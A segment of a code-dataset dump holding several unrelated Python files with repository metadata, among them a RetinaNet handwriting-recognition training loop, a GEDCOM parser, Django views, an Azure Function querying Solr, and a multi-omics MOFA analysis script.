model.resnet101(num_classes=dataset_train.num_classes(), pretrained=True)\n elif parser.depth == 152:\n retinanet = model.resnet152(num_classes=dataset_train.num_classes(), pretrained=True)\n else:\n raise ValueError('Unsupported model depth, must be one of 18, 34, 50, 101, 152') \n\n use_gpu = True\n train_htr=parser.train_htr=='True'\n train_det=parser.train_det=='True'\n retinanet.htr_gt_box=parser.htr_gt_box=='True'\n\n retinanet.train_htr=train_htr\n retinanet.epochs_only_det = parser.epochs_only_det\n\n if use_gpu:\n retinanet = retinanet.cuda()\n \n retinanet = torch.nn.DataParallel(retinanet).cuda()\n \n retinanet.training = True\n \n \n\n optimizer = optim.Adam(retinanet.parameters(), lr=1e-4)\n\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=50, verbose=True)\n\n loss_hist = collections.deque(maxlen=500)\n ctc = CTCLoss()\n retinanet.train()\n retinanet.module.freeze_bn()\n \n best_cer = 1000\n best_map = 0\n epochs_no_improvement=0\n verbose_each=1\n optimize_each =1\n print(('Num training images: {}'.format(len(dataset_train))))\n\n \n\n\n for epoch_num in range(parser.epochs):\n cers=[]\n\n retinanet.training=True\n\n retinanet.train()\n retinanet.module.freeze_bn()\n \n epoch_loss = []\n \n for iter_num, data in enumerate(dataloader_train):\n if iter_num>int(parser.max_iters_epoch): break\n try:\n if iter_num % optimize_each==0:\n optimizer.zero_grad()\n (classification_loss, regression_loss,ctc_loss,ner_loss) = retinanet([data['img'].cuda().float(), 
data['annot'],ctc,epoch_num])\n\n classification_loss = classification_loss.mean()\n regression_loss = regression_loss.mean()\n if train_det: \n\n if train_htr:\n loss = ctc_loss+ classification_loss+regression_loss+ner_loss\n\n else:\n loss = classification_loss+regression_loss\n \n elif train_htr:\n loss = ctc_loss\n\n else:\n continue\n if bool(loss == 0):\n continue\n loss.backward()\n torch.nn.utils.clip_grad_norm_(retinanet.parameters(), 0.1)\n if iter_num % verbose_each==0:\n print(('Epoch: {} | Step: {} |Classification loss: {:1.5f} | Regression loss: {:1.5f} | CTC loss: {:1.5f} | NER loss: {:1.5f} | Running loss: {:1.5f} | Total loss: {:1.5f}\\r'.format(epoch_num,iter_num, float(classification_loss), float(regression_loss),float(ctc_loss),float(ner_loss),np.mean(loss_hist),float(loss),\"\\r\")))\n torch.cuda.empty_cache() \n\n optimizer.step()\n\n loss_hist.append(float(loss))\n\n epoch_loss.append(float(loss))\n\n \n except Exception as e:\n print(e)\n continue\n if parser.dataset == 'csv' and parser.csv_val is not None and train_det:\n\n print('Evaluating dataset')\n\n mAP = csv_eval.evaluate(dataset_val, retinanet,score_threshold=parser.score_threshold)\n mAP=float(mAP[0][0]) \n\n retinanet.eval()\n retinanet.training=False \n retinanet.score_threshold = float(parser.score_threshold) \n for idx,data in enumerate(dataloader_val):\n if idx>int(parser.max_iters_epoch): break\n print(\"Eval CER on validation set:\",idx,\"/\",len(dataset_val),\"\\r\")\n image_name = dataset_val.image_names[idx].split('/')[-1].split('.')[-2]\n\n #generate_pagexml(image_name,data,retinanet,parser.score_threshold,parser.nms_threshold,dataset_val)\n text_gt = dataset_val.image_names[idx].split('.')[0]+'.txt'\n f =open(text_gt,'r')\n text_gt_lines=f.readlines()[0]\n transcript_pred = get_transcript(image_name,data,retinanet,float(parser.score_threshold),float(parser.nms_threshold),dataset_val,alphabet)\n cers.append(float(editdistance.eval(transcript_pred,text_gt_lines))/len(text_gt_lines))\n\n t=str(time.time()).split('.')[0]\n\n valid_cer_f=open(experiment_id+'_valid_CER.txt','a')\n valid_cer_f.write(str(epoch_num)+\" \"+str(np.mean(cers))+\" \"+t+'\\n')\n valid_cer_f.close()\n print(\"GT\",text_gt_lines)\n print(\"PREDS SAMPLE:\",transcript_pred)\n \n\n if parser.early_stop_crit=='cer':\n\n if float(np.mean(cers))<float(best_cer): \n best_cer=np.mean(cers)\n epochs_no_improvement=0\n torch.save(retinanet.module, 'trained_models/'+parser.model_out+'{}_retinanet.pt'.format(parser.dataset))\n else: epochs_no_improvement+=1\n elif parser.early_stop_crit=='map':\n if mAP>best_map:\n best_map=mAP \n epochs_no_improvement=0\n torch.save(retinanet.module, 'trained_models/'+parser.model_out+'{}_retinanet.pt'.format(parser.dataset))\n \n else: epochs_no_improvement+=1\n if train_det:\n print(epoch_num,\"mAP: \",mAP,\" best mAP\",best_map)\n if train_htr:\n print(\"VALID CER:\",np.mean(cers),\"best CER\",best_cer) \n print(\"Epochs no improvement:\",epochs_no_improvement)\n if epochs_no_improvement>3:\n for param_group in optimizer.param_groups:\n if param_group['lr']>10e-5:\n param_group['lr']*=0.1\n \n if epochs_no_improvement>=parser.max_epochs_no_improvement:\n print(\"TRAINING FINISHED AT EPOCH\",epoch_num,\".\")\n sys.exit()\n \n scheduler.step(np.mean(epoch_loss)) \n torch.cuda.empty_cache() \n \n\n retinanet.eval()\n\n #torch.save(retinanet, 'model_final.pt'.format(epoch_num))\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"kapitsa2811/research-e2e-pagereader","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5907053097","text":"#!/usr/bin/env python3\n# rdainfo.py - report a piece of rda-related info, use --help for details\n# Both a command line utility and a Python utility module.\n\nimport os\nimport sys\nimport argparse\nimport os.path as path\n\ndef top(unknown=False, **kwargs):\n d = os.getcwd()\n while True:\n if path.isdir(path.join(d, 'build')):\n return d\n parent = path.dirname(d)\n if parent == d:\n if unknown:\n return 'unknown'\n raise Exception('Not in an RDA sandbox.')\n d = parent\n\ndef host(unknown=False, **kwargs):\n if sys.platform.startswith('linux'):\n return 'linux'\n if sys.platform.startswith('win'):\n return 'windows'\n if sys.platform.startswith('darwin'):\n return 'osx'\n if unknown:\n return 'unknown'\n raise Exception('Unknown host: ' + sys.platform)\n\nif __name__ == '__main__':\n\n # Parse arguments\n\n parser = argparse.ArgumentParser(\n description='Report RDA-related information.')\n parser.add_argument('--top', action='store_true',\n help='Report the root of the sandbox containing the current directory.')\n parser.add_argument('--host', action='store_true',\n help='Report the host type running this program:'\n ' linux, windows, or osx.')\n parser.add_argument('--all', action='store_true',\n help='Report all items, with labels. Implies --unknown.')\n parser.add_argument('--unknown', action='store_true',\n help='Print \\'unknown\\' instead of raising exceptions.')\n parser.add_argument('--debug', action='store_true',\n help='Debug this script: print extra crap.')\n args = parser.parse_args()\n\n # Process the arguments\n if args.debug:\n print(args)\n if args.all:\n args.unknown = True\n print('top:', top(**args.__dict__))\n print('host:', host(**args.__dict__))\n else:\n if args.top:\n print(top(**args.__dict__))\n if args.host:\n print(host(**args.__dict__))\n\n","repo_name":"lros/rda","sub_path":"bin/rdainfo.py","file_name":"rdainfo.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73857730721","text":"from django.shortcuts import render, redirect\nfrom .forms import UserForm\nfrom .usecases import *\nfrom django.contrib import messages\n# Create your views here.\ndef index(request):\n return render(request, 'main/index.html')\n\ndef registration(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n messages.success(request,\n f\"Welcome to our site {username}!\")\n form.save(commit=True)\n return redirect('login')\n else:\n messages.error(request,\n \"Please correct the errors below.\")\n context = {'form': form}\n return render(request, 'registration/create_user.html', context)\n\n context = {'form': UserForm()}\n return render(request, 'registration/create_user.html', context)\n\ndef about(request):\n return render(request, 'main/about.html')","repo_name":"Elhsan/AKFA","sub_path":"Akfa_project/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44155716614","text":"# Kirk Vasilas\n# adapted from Ryan Tom\n# python3.5\n# to run call tag_parse.read_file('./proj02test.ged')\n\ndef 
strip_line(ged_line):\n    return ged_line.strip('\\n').split(\" \")\n\n\ndef validate(line):\n    zero_tags = [\"INDI\", \"FAM\", \"HEAD\", \"TRLR\", \"NOTE\"]\n    one_tags = [\"NAME\", \"SEX\", \"BIRT\", \"DEAT\", \"FAMC\",\n                \"FAMS\", \"MARR\", \"HUSB\", \"WIFE\", \"CHIL\", \"DIV\"]\n    two_tags = [\"DATE\"]\n\n    level = line.pop(0)\n    tag = line.pop(0)\n    args = \" \".join(line)\n    status = False\n\n    if (tag == \"INDI\" or tag == \"FAM\"):\n        status = False\n\n    if ((args in zero_tags) or (args in one_tags) or (args in two_tags)):\n        temp = tag\n        tag = args\n        args = temp\n    if ((level == \"0\") and (tag in zero_tags)):\n        status = True\n    elif ((level == \"1\") and (tag in one_tags)):\n        status = True\n    elif ((level == \"2\") and (tag in two_tags)):\n        status = True\n    return(status, tag, args)\n\n\ndef read_file(path):\n    file = open(path)\n    ged_lines=file.readlines()\n    person_date_tags = [\"BIRT\", \"DEAT\"]\n    fam_date_tags= [\"MARR\",\"DIV\"]\n    fam_flag=False\n    date_type=''\n    people={}\n    curr_id = \"\"\n    families={}\n    for ged_line in ged_lines:\n        status, tag, args = validate(strip_line(ged_line))\n        if(status == True):\n            if(tag == \"INDI\"):\n                curr_id = args\n                if curr_id in people:\n                    people[curr_id][\"isDuplicate\"] = True\n                else:\n                    people[curr_id] = {}\n                    people[curr_id][\"ID\"] = args\n                fam_flag = False\n\n            if(tag == \"NAME\" or tag == \"SEX\"):\n                people[curr_id][tag] = args\n\n            if(tag in person_date_tags):\n                date_type = tag\n            if(tag == \"DATE\"):\n                if(fam_flag == False):\n                    people[curr_id][date_type] = args\n                else:\n                    families[curr_id][date_type] = args\n\n            if(tag == \"FAM\"):\n                curr_id = args\n                fam_flag = True\n                if curr_id in families:\n                    families[curr_id][\"isDuplicate\"] = True\n                else:\n                    families[curr_id] = {}\n                    families[curr_id][\"ID\"] = args\n\n            if(tag in fam_date_tags):\n                date_type = tag\n            if(tag == \"HUSB\" or tag == \"WIFE\"):\n                families[curr_id][tag]=args\n            if(tag == \"CHIL\"):\n                if( tag not in families[curr_id].keys() ):\n                    families[curr_id][tag] = [args]\n                else:\n                    families[curr_id][tag].append(args)\n\n    file.close()\n    return(people, families)\n\n    # old: do not delete, it's a good reference for now\n    # print(people, families, sep='\\n')\n    # print(people.keys())\n    # print(people['rn'].keys())\n    # print(\"\\n### Individuals ###\")\n    # for key in people:\n    #     print(\"id =\",people[key]['ID'], \"| name =\", people[key]['NAME'], sep=' ')\n    # print(\"\\n\\n### Families ###\")\n    # for key in families:\n    #     print(\"\\nFamily =\",families[key]['ID'], sep=' ')\n    #     print(\"Husband => id =\", families[key]['HUSB'],\"| Name =\",people[families[key]['HUSB']]['NAME'] )\n    #     print(\"Wife => id =\", families[key]['WIFE'],\"| Name =\", people[families[key]['WIFE']]['NAME'])\n\n#read_file('./proj02test.ged')\n#read_file('./targ.ged')\n","repo_name":"kvasilas/CS555ws","sub_path":"tag_parse.py","file_name":"tag_parse.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"33051361648","text":" # -*- coding: utf-8 -*-\r\n#This script contains sample codes for encoding support in Beautiful Soup\r\nfrom bs4 import BeautifulSoup\r\n\r\n#without encoding specified\r\n\r\nhtml_markup = \"\"\"<p> The Spanish language is written using the Spanish alphabet, which is the Latin alphabet with one additional letter, eñe ⟨ñ⟩, for a total of 27 letters.</p>\r\n\"\"\"\r\nsoup = BeautifulSoup(html_markup,\"lxml\")\r\nprint(soup.p.string)\r\n\r\n#with utf-8\r\n\r\nsoup = 
BeautifulSoup(html_markup,\"lxml\",from_encoding=\"utf-8\")\r\nprint(soup.prettify())\r\n\r\n#with latin-1\r\nsoup = BeautifulSoup(html_markup,\"lxml\",from_encoding=\"latin-1\")\r\nprint(soup.prettify())\r\n\r\n#original encoding\r\n\r\nhtml_markup = \"\"\"\r\n<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=ISO8859-2\"/>\r\n<p>cédille (from French), is a hook or tail ( ž ) added under certain letters as a diacritical mark to modify their pronunciation\r\n</p>\"\"\"\r\nsoup = BeautifulSoup(html_markup,\"lxml\") \r\nprint(soup.original_encoding)\r\n\r\n\r\n#using specific encoding in output\r\n\r\nprint(soup.prettify(\"ISO8859-2\"))\r\n\r\n#using encode\r\n\r\nprint(soup.p.encode())\r\n\r\n\r\n#encode using specific encoding \r\n\r\nprint(soup.encode(\"ISO-8859-2\"))\r\n","repo_name":"tasdikrahman/srm_search_engine","sub_path":"beautiful_soup_guide/9554_06.py","file_name":"9554_06.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
{"seq_id":"15941261440","text":"nombre=input(\"Enter your name:\")\na=0\nwhile a==0:\n    edad=int(input(\"Enter your age:\"))\n    if edad>0 and edad<18:\n        valorC=30000\n        tipo=\"Youth\"\n        a+=1\n    elif edad>=18 and edad<=100:\n        valorC=45000\n        tipo=\"Adult\"\n        a+=1\n    else:\n        print(\"That age is not valid\")\n        print(\"\")\ncantidad=int(input(\"Enter the number of shirts to buy:\"))\ntotal=valorC*cantidad\nprint(\"\")\nprint(\"NAME:\",nombre)\nprint(\"SHIRT TYPE:\",tipo)\nprint(\"TOTAL TO PAY:\",total)\n","repo_name":"Juan-C13/Venta-de-camisetas","sub_path":"02 Instruccion if - else.py","file_name":"02 Instruccion if - else.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"26606818234","text":"import logging\nimport json\nimport azure.functions as func\nimport pandas as pd\n# from postAllProducts import views\nimport os \nimport pysolr\n\nsolr_url_config=\"https://52.152.191.13:8983/solr\"\nsolr_product= pysolr.Solr(solr_url_config+\"/product_information/\", timeout=10,verify=False)\nsolr_notification_status=pysolr.Solr(solr_url_config+'/sap_notification_status/', timeout=10,verify=False)\nsolr_unstructure_data=pysolr.Solr(solr_url_config+'/unstructure_processed_data/', timeout=10,verify=False)\nsolr_document_variant=pysolr.Solr(solr_url_config+'/sap_document_variant/', timeout=10,verify=False)\nsolr_ghs_labeling_list_data=pysolr.Solr(solr_url_config+'/sap_ghs_labeling_list_data/', timeout=10,verify=False)\nproduct_column = [\"TYPE\",\"TEXT1\",\"TEXT2\",\"TEXT3\",\"TEXT4\",\"SUBCT\"]\nsolr_product_column = \",\".join(product_column)\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n    try:\n        logging.info('postBasicProperties function processing a request.')\n        result=[]\n        req_body = req.get_json() \n        basic_details=get_basic_properties_details(req_body)\n        result = json.dumps(basic_details)\n    except Exception as e:\n        logging.error(str(e))\n    return func.HttpResponse(result,mimetype=\"application/json\")\n\ndef querying_solr_data(query,params):\n    try:\n        df_product_combine=pd.DataFrame() \n        response = solr_product.search(query,**params)\n        result = json.dumps(list(response))\n        df_product_combine=pd.read_json(result,dtype=str)\n        if len(df_product_combine.columns)!=len(product_column):\n            dummy=pd.DataFrame([],columns=product_column)\n            df_product_combine=pd.concat([df_product_combine,dummy]).fillna(\"-\")\n
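        # Added comment: the concat with an empty frame above pads any columns missing from the\n        # Solr response, so every field named in product_column exists before the fillna below.\n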
df_product_combine=df_product_combine.fillna(\"-\")\n return df_product_combine\n except Exception as e:\n return df_product_combine\n\ndef basic_spec_constructor(req_body):\n try:\n last_specid=''\n namlist=[]\n synlist=[]\n speclist_data=[]\n spec_body=req_body\n spec_list=[]\n for item in spec_body: \n spec_details=item.get(\"name\").split(\" | \")\n spec_list.append(spec_details[0])\n spec_list=list(set(spec_list))\n product_spec=[data.replace(\" \",\"\\ \") for data in spec_list]\n spec_query=\" || \".join(product_spec)\n params={\"rows\":2147483647,\"fl\":solr_product_column}\n query=f'TYPE:NAMPROD && SUBCT:REAL_SUB && TEXT2:({spec_query})'\n specdetails=list(solr_product.search(query,**params))\n for data in specdetails:\n spec_id=data.get(\"TEXT2\",\"-\")\n if (last_specid!=spec_id) and last_specid!='':\n namlist=list(set(namlist))\n synlist=list(set(synlist))\n namstr=\",\".join(namlist)\n synstr=\", \".join(synlist)\n speclist_data.append([last_specid,namstr,synstr]) \n namlist=[]\n synlist=[]\n dat_nam=data.get(\"TEXT1\",\"\")\n dat_syn=data.get(\"TEXT3\",\"\")\n namlist.append(dat_nam)\n synlist.append(dat_syn)\n else: \n dat_nam=data.get(\"TEXT1\",\"\")\n dat_syn=data.get(\"TEXT3\",\"\")\n namlist.append(dat_nam)\n synlist.append(dat_syn) \n last_specid = spec_id \n namlist=list(set(namlist))\n synlist=list(set(synlist))\n namstr=\",\".join(namlist)\n synstr=\", \".join(synlist)\n speclist_data.append([last_specid,namstr,synstr]) \n return speclist_data\n except Exception as e:\n return speclist_data\n\ndef get_material_details_on_selected_spec(product_rspec,params):\n try:\n query=f'TYPE:MATNBR && TEXT2:{product_rspec}'\n matinfo=solr_product.search(query,**params)\n matstr=[]\n bdt_list=[]\n material_list=[]\n material_details=[]\n desc_list=[]\n for i in list(matinfo):\n bdt=str(i.get(\"TEXT3\")).strip()\n bdt_list.append(bdt)\n matnumber=str(i.get(\"TEXT1\"))\n material_list.append(matnumber)\n desc=str(i.get(\"TEXT4\"))\n desc_list.append(desc)\n matjson={\n \"bdt\":bdt,\n \"material_number\":matnumber,\n \"description\":desc,\n }\n if bdt:\n bstr=bdt+\" - \"+matnumber+\" - \"+desc\n matstr.append(bstr)\n material_details.append(matjson)\n material_list=list(set(material_list))\n bdt_list=list(set(bdt_list))\n return material_list,bdt_list,desc_list,matstr,material_details\n except Exception as e:\n return [],[],[],[],[]\n\ndef get_cas_details_on_selected_spec(product_rspec,params):\n try:\n cas_list=[]\n query=f'TYPE:SUBIDREL && TEXT2:{product_rspec}'\n temp_df=querying_solr_data(query,params) \n column_value = list(temp_df[\"TEXT1\"].unique())\n product_cas=[data.replace(\" \",\"\\ \") for data in column_value]\n cas_query=\" || \".join(product_cas)\n params={\"rows\":2147483647,\"fl\":solr_product_column}\n query=f'TYPE:NUMCAS && SUBCT:(PURE_SUB || REAL_SUB) && TEXT2:({cas_query})'\n casdetails=list(solr_product.search(query,**params))\n return casdetails\n except Exception as e:\n return cas_list\n\ndef get_basic_properties_details(req_body):\n try:\n speclist_data = basic_spec_constructor(req_body)\n product_level_details=[]\n material_level_details=[]\n cas_level_details=[]\n product_level_dict={}\n material_level_dict={}\n cas_level_dict={}\n for specid,namprod,synonyms in speclist_data:\n product_level_dict[\"specId\"]=specid\n product_level_dict[\"prodIdentifiers\"]=namprod\n product_level_dict[\"synonyms\"]=synonyms\n params={\"rows\":2147483647,\"fl\":\"TEXT1,TEXT2,TEXT3,TEXT4\"}\n 
material_list,bdt_list,desc_list,matstr,material_details=get_material_details_on_selected_spec(specid,params)\n len_active_mat=0\n for data in desc_list:\n if data[0] !='^':\n len_active_mat+=1\n # year=[]\n # kg=0\n # check_material=list(set(material_list))\n # material_dump=[data.replace(\" \",\"\\ \") for data in check_material]\n # material_query=\" || \".join(material_dump)\n # query=f'CATEGORY:SAP-BW && IS_RELEVANT:1 && PRODUCT:({material_query})'\n # params={\"rows\":2147483647,\"fl\":\"DATA_EXTRACT,CATEGORY,PRODUCT\"}\n # salesinfo=list(solr_unstructure_data.search(query,**params))\n # matlist_kg={}\n # matkg=0\n # last_mat=''\n # for data in salesinfo:\n # material_number=data.get(\"PRODUCT\",\"-\") \n # datastr=json.loads(data.get(\"DATA_EXTRACT\"))\n # soldyear=str(datastr.get(\"Fiscal year/period\",\"-\"))\n # kg=kg+int(datastr.get(\"SALES KG\",0))\n # if last_mat!=material_number and last_mat!='':\n # matlist_kg[last_mat]=matkg\n # matkg=0 \n # else:\n # matkg+=int(datastr.get(\"SALES KG\",0)) \n # soldyear=soldyear.split(\".\")\n # if len(year)>1:\n # year.append(int(soldyear[1]))\n # last_mat=material_number\n # matlist_kg[last_mat]=matkg\n # year.sort()\n product_level_dict[\"no_Active_Materials\"]=len_active_mat\n # if len(year)>1:\n # product_level_dict[\"sales_Year\"]=str(year[0])+\" TO \"+str(year[-1])\n # elif len(year)==1:\n # product_level_dict[\"sales_Year\"]=str(year[0])\n # else:\n # product_level_dict[\"sales_Year\"]='-'\n\n # params={\"rows\":2147483647}\n # query=f'SUBID:{specid}'\n # ghsdata=list(solr_ghs_labeling_list_data.search(query,**params))\n # SignalWord=str(ghsdata[0].get(\"SIGWD\",\"-\")).strip()\n # Pictogram=str(ghsdata[0].get(\"SYMBL\",\"-\")).strip()\n # HStatement=str(ghsdata[0].get(\"HAZST\",\"-\")).strip()\n # product_level_dict[\"GHS_Information\"]=SignalWord+\", \"+Pictogram+\", \"+HStatement\n product_level_details.append(product_level_dict)\n product_level_dict={} \n\n #materila level details \n for matjson in material_details:\n material_level_dict[\"material_Number\"]=matjson.get(\"material_number\",\"-\")\n material_level_dict[\"description\"]=matjson.get(\"description\",\"-\")\n material_level_dict[\"spec_Id\"]=str(specid)+\" - \"+str(namprod)\n material_level_dict[\"BDT\"]=matjson.get(\"bdt\",\"-\")\n matnumber=matjson.get(\"material_number\",\"-\")\n # material_level_dict[\"sales_Volume\"]=str(matlist_kg.get(matnumber,\"0\"))+\" Kg\"\n material_level_details.append(material_level_dict)\n material_level_dict={}\n \n #cas level details\n params={\"rows\":2147483647,\"fl\":\"TEXT1,TEXT2,TEXT3,TEXT4\"}\n catlist=get_cas_details_on_selected_spec(specid,params)\n for data in catlist:\n cas_level_dict[\"cas_Number\"]=data.get(\"TEXT1\",\"-\")\n cas_level_dict[\"chemical_Name\"]=data.get(\"TEXT3\",\"-\")\n cas_level_dict[\"spec_Id\"]=str(specid)+\" - \"+str(namprod)\n cas_level_dict[\"pure_Spec_Id\"]=data.get(\"TEXT2\",\"-\")\n cas_level_details.append(cas_level_dict)\n cas_level_dict={}\n result={}\n result[\"productLevel\"]=product_level_details\n result[\"materialLevel\"]=material_level_details\n result[\"CASLevel\"]=cas_level_details\n\n return [result]\n except Exception as e:\n return [result]","repo_name":"momentive-pih/Python-functionapp","sub_path":"postBasicProperties/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10380071112","text":"# ---\n# jupyter:\n# jupytext:\n# formats: 
ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.3'\n# jupytext_version: 1.0.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %matplotlib inline\n# %autosave 0\n# %load_ext autoreload\n# %autoreload 2\n\nimport igraph\nimport logging\nimport numpy as np\nimport pandas as pd\nimport pkg_resources\nimport seaborn as sns\nfrom crispy.MOFA import MOFA\nimport matplotlib.pyplot as plt\nfrom scipy.stats import skew\nfrom crispy.GIPlot import GIPlot\nfrom crispy.DataImporter import PPI\nfrom sklearn.decomposition import PCA\nfrom crispy.Enrichment import Enrichment\nfrom crispy.LMModels import LMModels, LModel\nfrom multiomics_integration.notebooks import DataImport, two_vars_correlation\n\nLOG = logging.getLogger(\"multiomics_integration\")\nDPATH = pkg_resources.resource_filename(\"data\", \"/\")\nPPIPATH = pkg_resources.resource_filename(\"data\", \"ppi/\")\nTPATH = pkg_resources.resource_filename(\"tables\", \"/\")\nRPATH = pkg_resources.resource_filename(\"multiomics_integration\", \"plots/DIANN/\")\n\n\n# ### Imports\n\n# Pathways\nemt_sig = Enrichment.read_gmt(f\"{DPATH}/pathways/emt.symbols.gmt\")\nemt_sig = emt_sig[\"HALLMARK_EPITHELIAL_MESENCHYMAL_TRANSITION\"]\n\nproteasome_sig = Enrichment.read_gmt(f\"{DPATH}/pathways/proteasome.symbols.gmt\")\nproteasome_sig = proteasome_sig[\"BIOCARTA_PROTEASOME_PATHWAY\"]\n\ntranslation_sig = Enrichment.read_gmt(f\"{DPATH}/pathways/translation_initiation.symbols.gmt\")\ntranslation_sig = translation_sig[\"GO_TRANSLATIONAL_INITIATION\"]\n\n# MOFA analysis\n\nfactors, weights, rsquare = MOFA.read_mofa_hdf5(f\"{TPATH}/MultiOmics_broad.hdf5\")\n\n# Perturbation proteomics differential analysis\nperturb = pd.read_csv(f\"{DPATH}/perturbation_proteomics_diff_analysis.csv\")\nperturb_diff = pd.pivot_table(perturb, index=\"GeneSymbol\", columns=\"comparison\", values=\"diff\")\nperturb_corr = pd.DataFrame(\n {\n f: {\n c: two_vars_correlation(weights[\"proteomics\"][f], perturb_diff[c])[\"corr\"]\n for c in perturb_diff\n }\n for f in weights[\"proteomics\"]\n }\n)\n\n# Read samplesheet\nss = DataImport.read_samplesheet()\n\n# Read proteomics (Proteins x Cell lines)\nprot = DataImport.read_protein_matrix(map_protein=True)\nprot_reps = pd.read_csv(f\"{DPATH}/E0022_P06_Protein_Matrix_Raw_Mean_Intensities.tsv.gz\", sep=\"\\t\", index_col=0)\n\n# Read Transcriptomics\ngexp = DataImport.read_gene_matrix()\n\n# Read CRISPR\ncrispr = DataImport.read_crispr_matrix()\n\n# Read Methylation\nmethy = DataImport.read_methylation_matrix()\n\n# Read Drug-response\ndrespo = DataImport.read_drug_response()\n\n# Covariates\ncovariates = pd.concat(\n [\n ss[\"CopyNumberAttenuation\"],\n ss[\"GeneExpressionAttenuation\"],\n ss[\"EMT\"],\n ss[\"Proteasome\"],\n ss[\"TranslationInitiation\"],\n ss[\"CopyNumberInstability\"],\n prot.loc[[\"CDH1\", \"VIM\"]].T.add_suffix(\"_prot\"),\n gexp.loc[[\"CDH1\", \"VIM\"]].T.add_suffix(\"_gexp\"),\n pd.get_dummies(ss[\"media\"]),\n pd.get_dummies(ss[\"growth_properties\"]),\n pd.get_dummies(ss[\"tissue\"])[[\"Haematopoietic and Lymphoid\", \"Lung\"]],\n ss[[\"ploidy\", \"mutational_burden\", \"growth\", \"size\"]],\n ss[\"replicates_correlation\"].rename(\"RepsCorrelation\"),\n prot.mean().rename(\"MeanProteomics\"),\n methy.mean().rename(\"MeanMethylation\"),\n drespo.mean().rename(\"MeanDrugResponse\"),\n ],\n axis=1,\n)\n\n# Merged samplesheet\nss_merged = pd.concat(\n [\n ss,\n prot.reindex(proteasome_sig).mean().rename(\"ProteasomeMean\"),\n 
prot.reindex(translation_sig).mean().rename(\"TranslationInitiationMean\"),\n factors,\n prot.mean().rename(\"MeanProtein\"),\n prot.std().rename(\"StdProtein\"),\n ],\n axis=1,\n)\n\n# Covariates and factors correlation\nn_factors_corr = {}\nfor f in factors:\n n_factors_corr[f] = {}\n\n for c in covariates:\n fc_samples = list(covariates.reindex(factors[f].index)[c].dropna().index)\n n_factors_corr[f][c] = two_vars_correlation(\n factors[f][fc_samples], covariates[c][fc_samples]\n )[\"corr\"]\nn_factors_corr = pd.DataFrame(n_factors_corr)\n\n\n# ### Clustermap with weights correlation\nn_heatmaps = len(rsquare)\nnrows, ncols = list(rsquare.values())[0].shape\n\nrow_order = list(list(rsquare.values())[0].index)\ncol_order = list(list(rsquare.values())[0].columns)\n\nf, axs = plt.subplots(\n n_heatmaps + 2,\n 1,\n sharex=\"none\",\n sharey=\"none\",\n gridspec_kw={\"height_ratios\": [1.5] * n_heatmaps + [9] + [1.5]},\n figsize=(0.25 * ncols, 0.3 * n_heatmaps + 0.3 * n_factors_corr.shape[0]),\n)\n\nvmax = np.max([rsquare[k].max().max() for k in rsquare])\n\n# Factors\nfor i, k in enumerate(rsquare):\n axh = axs[i]\n\n df = rsquare[k]\n\n # Heatmap\n g = sns.heatmap(\n df.loc[row_order, col_order],\n cmap=\"Blues\",\n annot=True,\n cbar=False,\n fmt=\".1f\",\n linewidths=0.5,\n ax=axh,\n vmin=0,\n vmax=vmax,\n annot_kws={\"fontsize\": 5},\n )\n axh.set_ylabel(f\"{k} cell lines\")\n g.set_xticklabels([])\n g.set_yticklabels(g.get_yticklabels(), rotation=0, horizontalalignment=\"right\")\n\n# Covariates\nax = axs[n_heatmaps]\n\ng = sns.heatmap(\n n_factors_corr.loc[:, col_order],\n cmap=\"RdYlGn\",\n center=0,\n annot=True,\n cbar=False,\n fmt=\".2f\",\n linewidths=0.5,\n ax=ax,\n annot_kws={\"fontsize\": 5},\n)\nax.set_xlabel(\"\")\nax.set_ylabel(f\"Potential related factors\")\n\n# Perturbation\nax = axs[n_heatmaps + 1]\n\ng = sns.heatmap(\n perturb_corr.loc[:, col_order],\n cmap=\"RdYlGn\",\n center=0,\n annot=True,\n cbar=False,\n fmt=\".2f\",\n linewidths=0.5,\n ax=ax,\n annot_kws={\"fontsize\": 5},\n)\nax.set_xlabel(\"\")\nax.set_ylabel(f\"\")\n\ng.set_xticklabels(g.get_xticklabels(), rotation=0, va=\"center\")\n\nplt.subplots_adjust(hspace=0.025)\n\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap.pdf\", bbox_inches=\"tight\")\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap.png\", bbox_inches=\"tight\", dpi=600)\nplt.close(\"all\")\n\n\n###\nplot_df = pd.concat([\n rsquare[\"Haem\"].T.add_prefix(\"Haem_\"),\n rsquare[\"Other\"].T.add_prefix(\"Other_\"),\n n_factors_corr.T.add_prefix(\"Corr_\"),\n perturb_corr.T.add_prefix(\"Pert_\"),\n], axis=1).T\n\n\nf, axs = plt.subplots(\n 3,\n 1,\n sharex=\"col\",\n sharey=\"none\",\n gridspec_kw={\"height_ratios\": [1.5] * 2 + [9]},\n figsize=(plot_df.shape[1] * 0.25, plot_df.shape[0] * 0.25),\n)\n\nfor i, n in enumerate([\"Haem\", \"Other\"]):\n df = plot_df[[i.startswith(n) for i in 